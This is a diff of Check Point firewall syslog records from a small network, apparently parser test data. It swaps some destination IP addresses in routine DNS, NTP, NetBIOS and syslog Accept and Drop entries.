+<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:26:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810485,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57005"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-29T20:26:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81048e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46647"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:26:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81048f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
@@ -5103,7 +5103,7 @@
 <134>1 2020-03-29T20:27:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104bb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:28:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104d9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:28:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104db,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:28:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:28:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:28:37Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f7,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T20:28:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57621"; service:"57621"; src:"192.168.1.94"]
 <134>1 2020-03-29T20:28:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
@@ -5191,8 +5191,8 @@
 <134>1 2020-03-29T20:39:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81079f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:40:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56484"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43091"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107ad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585514413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56510"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43091"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107ad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585514413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56510"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54213"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41225"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50104"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10469"; xlatesrc:"0.0.0.0"]
@@ -5400,8 +5400,8 @@
 <134>1 2020-03-29T21:10:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ea9,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32856"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:10:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ea9,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37412"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10489"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32902"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810ec0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516224"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810ec0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516224"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34375"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
